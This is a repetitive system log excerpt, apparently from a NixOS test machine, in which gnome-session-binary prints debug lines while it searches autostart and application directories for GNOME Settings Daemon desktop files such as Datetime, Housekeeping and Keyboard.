machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Datetime.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
